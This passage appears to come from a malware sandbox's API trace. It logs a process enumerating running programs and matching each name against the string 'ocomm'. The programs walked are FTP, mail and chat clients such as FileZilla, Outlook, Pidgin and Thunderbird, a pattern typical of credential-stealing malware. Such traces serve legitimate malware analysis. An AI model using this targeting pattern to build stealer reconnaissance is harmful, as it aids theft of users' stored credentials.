dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0095.805] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356ad58 [0095.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356ad58, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0095.805] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0095.805] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="ocomm") returned 0x0 [0095.805] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0095.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.806] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3573c38 [0095.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3573c38, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0095.806] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0095.806] StrStrIA (lpFirst="3dftp.exe", lpSrch="ocomm") returned 0x0 [0095.806] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0095.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.807] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35759e0 [0095.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x35759e0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0095.807] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0095.807] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="ocomm") returned 0x0 [0095.807] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0095.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.808] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3573ab8 [0095.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3573ab8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0095.808] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0095.808] StrStrIA (lpFirst="alftp.exe", lpSrch="ocomm") returned 0x0 [0095.808] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0095.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.809] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3573bc0 [0095.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3573bc0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0095.810] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0095.810] StrStrIA (lpFirst="barca.exe", lpSrch="ocomm") returned 0x0 [0095.810] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0095.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.811] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573ad0 [0095.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3573ad0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0095.811] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0095.811] StrStrIA (lpFirst="bitkinex.exe", lpSrch="ocomm") returned 0x0 [0095.811] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0095.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.812] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573ba8 [0095.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3573ba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0095.812] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0095.812] StrStrIA (lpFirst="coreftp.exe", lpSrch="ocomm") returned 0x0 [0095.812] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0095.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.816] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574d40 [0095.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3574d40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0095.816] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0095.816] StrStrIA (lpFirst="far.exe", lpSrch="ocomm") returned 0x0 [0095.816] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0095.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.817] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3573bf0 [0095.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3573bf0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0095.817] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0095.817] StrStrIA (lpFirst="filezilla.exe", lpSrch="ocomm") returned 0x0 [0095.817] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0095.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.818] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35739f8 [0095.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x35739f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.818] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0095.818] StrStrIA (lpFirst="flashfxp.exe", lpSrch="ocomm") returned 0x0 [0095.818] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0095.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.819] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3573c08 [0095.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3573c08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0095.819] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0095.819] StrStrIA (lpFirst="fling.exe", lpSrch="ocomm") returned 0x0 [0095.819] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0095.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.820] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575c00 [0095.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3575c00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0095.820] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0095.821] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="ocomm") returned 0x0 [0095.821] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0095.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.822] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575b00 [0095.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3575b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0095.822] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0095.822] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="ocomm") returned 0x0 [0095.822] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0095.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.823] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574df0 [0095.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574df0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0095.823] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0095.823] StrStrIA (lpFirst="icq.exe", lpSrch="ocomm") returned 0x0 [0095.823] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0095.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.824] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573a10 [0095.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3573a10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.824] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0095.824] StrStrIA (lpFirst="leechftp.exe", lpSrch="ocomm") returned 0x0 [0095.824] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0095.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.825] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3573980 [0095.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3573980, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0095.825] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0095.825] StrStrIA (lpFirst="ncftp.exe", lpSrch="ocomm") returned 0x0 [0095.825] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0095.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.826] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573998 [0095.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3573998, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0095.826] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0095.826] StrStrIA (lpFirst="notepad.exe", lpSrch="ocomm") returned 0x0 [0095.827] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0095.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.827] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3573a28 [0095.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x3573a28, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0095.828] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0095.828] StrStrIA (lpFirst="operamail.exe", lpSrch="ocomm") returned 0x0 [0095.828] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0095.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.829] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3573ae8 [0095.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3573ae8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0095.829] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0095.829] StrStrIA (lpFirst="outlook.exe", lpSrch="ocomm") returned 0x0 [0095.829] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0095.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0095.830] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35739c8 [0095.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x35739c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0095.830] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0095.830] StrStrIA (lpFirst="pidgin.exe", lpSrch="ocomm") returned 0x0 [0095.830] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0095.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.831] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35739e0 [0095.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x35739e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0095.831] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0095.831] StrStrIA (lpFirst="scriptftp.exe", lpSrch="ocomm") returned 0x0 [0095.831] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0095.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.832] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3573d28 [0095.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x3573d28, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0095.832] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0095.832] StrStrIA (lpFirst="skype.exe", lpSrch="ocomm") returned 0x0 [0095.832] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0095.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.833] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3573ef0 [0095.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x3573ef0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.833] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0095.833] StrStrIA (lpFirst="smartftp.exe", lpSrch="ocomm") returned 0x0 [0095.833] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0095.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, 